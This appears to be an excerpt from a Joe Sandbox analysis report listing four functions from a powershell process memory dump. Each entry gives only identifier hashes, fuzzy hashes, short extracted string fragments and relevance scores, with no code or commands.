                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$(fwl$(fwl
                                                                                                    • API String ID: 0-2555649572
                                                                                                    • Opcode ID: 9807f6f6c7a2a844d0d6ddaf09634cf31589aea44cfc58278deab3c55cfd8d38
                                                                                                    • Instruction ID: 42afb6a103f2521d612285135b3f82b3ce9510d44a444f84ad72e956cb063aa4
                                                                                                    • Opcode Fuzzy Hash: 9807f6f6c7a2a844d0d6ddaf09634cf31589aea44cfc58278deab3c55cfd8d38
                                                                                                    • Instruction Fuzzy Hash: 84717EF0A00109DFEB24CFA8C545A6ABBB2FF89314F1480A9D905AB755CF31EC41DBA1
                                                                                                    Function 07B430D8 Relevance: 5.2, Strings: 4, Instructions: 154COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84ul$84ul$tPfq$tPfq
                                                                                                    • API String ID: 0-357096077
                                                                                                    • Opcode ID: 518d035ea51cd3c9445024956ed8fc407393e2a164e01acb8943e11873734ba0
                                                                                                    • Instruction ID: 8f84b71cdfb967582d9a770443ad4b5d7f1faca1e649f31a88ba759f24d467fb
                                                                                                    • Opcode Fuzzy Hash: 518d035ea51cd3c9445024956ed8fc407393e2a164e01acb8943e11873734ba0
                                                                                                    • Instruction Fuzzy Hash: A84129F1704355AFD7209AA88801B6ABFF6EF85720F18809AE944EF281CA31DC41D7A1
                                                                                                    Function 07B40CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-2113499236
                                                                                                    • Opcode ID: cc1a480041c3c556e86cefc5d722c76ca305507b5cca1ecc3703fb840cf2e055
                                                                                                    • Instruction ID: aa8075735620559a3c9f90c749c7d8f6c155160a0ba15cc8e90b7eba29af108e
                                                                                                    • Opcode Fuzzy Hash: cc1a480041c3c556e86cefc5d722c76ca305507b5cca1ecc3703fb840cf2e055
                                                                                                    • Instruction Fuzzy Hash: 30216BF13103169BEF38697D980173777AAEBC1310F2480EEAA45CB382DD35D844A362
                                                                                                    Function 07B41749 Relevance: 5.1, Strings: 4, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$$fq$$fq
                                                                                                    • API String ID: 0-2206495126
                                                                                                    • Opcode ID: 8ec895722c3037b6ea581a93f073f051c60c358391e51b4b3c1e3009def6a69d
                                                                                                    • Instruction ID: 028ee658ac5c4bfd30c6d6feb280b8dcf80697c7081260555606dce68be9f177
                                                                                                    • Opcode Fuzzy Hash: 8ec895722c3037b6ea581a93f073f051c60c358391e51b4b3c1e3009def6a69d
                                                                                                    • Instruction Fuzzy Hash: 4101D8E5B0938D4FD726466C18205666FB6AFC259071540EBC041DF683C9194D8683B3